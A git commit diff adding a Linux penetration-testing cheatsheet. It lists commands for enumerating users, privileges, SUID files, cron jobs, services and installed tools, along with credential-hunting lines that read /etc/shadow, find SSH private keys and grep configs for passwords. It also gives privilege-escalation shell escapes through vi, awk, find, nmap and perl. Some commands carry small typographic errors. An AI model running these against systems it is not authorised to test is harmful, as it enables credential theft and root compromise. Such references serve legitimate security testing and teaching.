Update Cheatsheet_LinuxPentest.txt

OlivierLaflamme · web-flow · commit f9d5a32818ae · 2019-10-17T20:18:08.000-04:00
diff --git a/Cheatsheet_LinuxPentest.txt b/Cheatsheet_LinuxPentest.txt
@@ -313,6 +313,165 @@ df -h
 Are there any unmounted file-systems?
 cat /etc/fstab
 
+Kernel, Operating System & Device Information:
+
+Command	Result
+uname -a	Print all available system information
+uname -r	Kernel release
+uname -n	System hostname
+hostname	As above
+uname -m	Linux kernel architecture (32 or 64 bit)
+cat /proc/version	Kernel information
+cat /etc/*-release	Distribution information
+cat /etc/issue	As above
+cat /proc/cpuinfo	CPU information
+df -a	File system information
+ 
+
+Users & Groups:
+
+Command	Result
+cat /etc/passwd	List all users on the system
+cat /etc/group	List all groups on the system
+for i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/null	List all uid’s and respective group memberships
+cat /etc/shadow	Show user hashes – Privileged command
+grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'	List all super user accounts
+finger	Users currently logged in
+pinky	As above
+users	As above
+who -a	As above
+w	Who is currently logged in and what they’re doing
+last	Listing of last logged on users
+lastlog	Information on when all users last logged in
+lastlog –u %username%	Information on when the specified user last logged in
+lastlog |grep -v "Never"	Entire list of previously logged on users
+ 
+
+
+User & Privilege Information:
+
+Command	Result
+whoami	Current username
+id	Current user information
+cat /etc/sudoers	Who’s allowed to do what as root – Privileged command
+sudo -l	Can the current user perform anything as root
+sudo -l 2>/dev/null | grep -w 'nmap|perl|'awk'|'find'|'bash'|'sh'|'man'
+
+|'more'|'less'|'vi'|'vim'|'nc'|'netcat'|python
+
+|ruby|lua|irb' | xargs -r ls -la 2>/dev/null	Can the current user run any ‘interesting’ binaries as root and if so also display the binary permissions etc.
+ 
+
+Environmental Information:
+
+Command	Result
+env	Display environmental variables
+set	As above
+echo $PATH	Path information
+history	Displays command history of current user
+pwd	Print working directory, i.e. ‘where am I’
+cat /etc/profile	Display default system variables
+cat /etc/shells	Display available shells
+ 
+
+Interesting Files:
+
+Command	Result
+find / -perm -4000 -type f 2>/dev/null	Find SUID files
+find / -uid 0 -perm -4000 -type f 2>/dev/null	Find SUID files owned by root
+find / -perm -2000 -type f 2>/dev/null	Find GUID files
+find / -perm -2 -type f 2>/dev/null	Find world-writeable files
+find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null	Find world-writeable files excluding those in /proc
+find / -perm -2 -type d 2>/dev/null	Find word-writeable directories
+find /home –name *.rhosts -print 2>/dev/null	Find rhost config files
+find /home -iname *.plan -exec ls -la {} ; -exec cat {} 2>/dev/null ;	Find *.plan files, list permissions and cat the file contents
+find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null ; -exec cat {} 2>/dev/null ;	Find hosts.equiv, list permissions and cat the file contents
+ls -ahlR /root/	See if you can access other user directories to find interesting files
+cat ~/.bash_history	Show the current users’ command history
+ls -la ~/.*_history	Show the current users’ various history files
+ls -la /root/.*_history	Can we read root’s history files
+ls -la ~/.ssh/	Check for interesting ssh files in the current users’ directory
+find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la	Find SSH keys/host information
+ls -la /usr/sbin/in.*	Check Configuration of inetd services
+grep -l -i pass /var/log/*.log 2>/dev/null	Check log files for keywords (‘pass’ in this example) and show positive matches
+find /var/log -type f -exec ls -la {} ; 2>/dev/null	List files in specified directory (/var/log)
+find /var/log -name *.log -type f -exec ls -la {} ; 2>/dev/null	List .log files in specified directory (/var/log)
+find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} ; 2>/dev/null	List .conf files in /etc (recursive 1 level)
+ls -la /etc/*.conf	As above
+find / -maxdepth 4 -name *.conf -type f -exec grep -Hn password {} ; 2>/dev/null	Find .conf files (recursive 4 levels) and output line number where the word ‘password’ is located
+lsof -i -n	List open files (output will depend on account privileges)
+head /var/mail/root	Can we read roots mail
+ 
+
+Service Information:
+
+Command	Result
+ps aux | grep root	View services running as root
+ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'	Lookup process binary path and permissions
+cat /etc/inetd.conf	List services managed by inetd
+cat /etc/xinetd.conf	As above for xinetd
+cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/null	A very ‘rough’ command to extract associated binaries from xinetd.conf and show permissions of each
+ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null	Permissions and contents of /etc/exports (NFS)
+ 
+
+Jobs/Tasks:
+
+Command	Result
+crontab -l -u %username%	Display scheduled jobs for the specified user – Privileged command
+ls -la /etc/cron*	Scheduled jobs overview (hourly, daily, monthly etc)
+ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null	What can ‘others’ write in /etc/cron* directories
+top	List of current tasks
+ 
+
+Networking, Routing & Communications:
+
+Command	Result
+/sbin/ifconfig -a	List all network interfaces
+cat /etc/network/interfaces	As above
+arp -a	Display ARP communications
+route	Display route information
+cat /etc/resolv.conf	Show configured DNS sever addresses
+netstat -antp	List all TCP sockets and related PIDs (-p Privileged command)
+netstat -anup	List all UDP sockets and related PIDs (-p Privileged command)
+iptables -L	List rules – Privileged command
+cat /etc/services	View port numbers/services mappings
+ 
+
+Programs Installed:
+
+Command	Result
+dpkg -l	Installed packages (Debian)
+rpm -qa	Installed packages (Red Hat)
+sudo -V	Sudo version – does an exploit exist?
+httpd -v	Apache version
+apache2 -v	As above
+apache2ctl (or apachectl) -M	List loaded Apache modules
+mysql --version	Installed MYSQL version details
+psql -V	Installed Postgres version details
+perl -v	Installed Perl version details
+java -version	Installed Java version details
+python --version	Installed Python version details
+ruby -v	Installed Ruby version details
+find / -name %program_name% 2>/dev/null (i.e. nc, netcat, wget, nmap etc)	Locate ‘useful’ programs (netcat, wget etc)
+which %program_name% (i.e. nc, netcat, wget, nmap etc)	As above
+dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null	List available compilers
+cat /etc/apache2/envvars 2>/dev/null |grep -i 'user|group' |awk '{sub(/.*export /,"")}1'	Which account is Apache running as
+ 
+
+Common Shell Escape Sequences:
+
+Command	Program(s)
+:!bash	vi, vim
+:set shell=/bin/bash:shell	vi, vim
+!bash	man, more, less
+find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ; 	find
+awk 'BEGIN {system("/bin/bash")}'	awk
+--interactive	nmap
+echo "os.execute('/bin/sh')" > exploit.nse
+
+sudo nmap --script=exploit.nse	nmap (thanks to comment by anonymous below)
+perl -e 'exec "/bin/bash";'	Perl
+
 
 What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID
 find / -perm -1000 -type d 2>/dev/null    # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
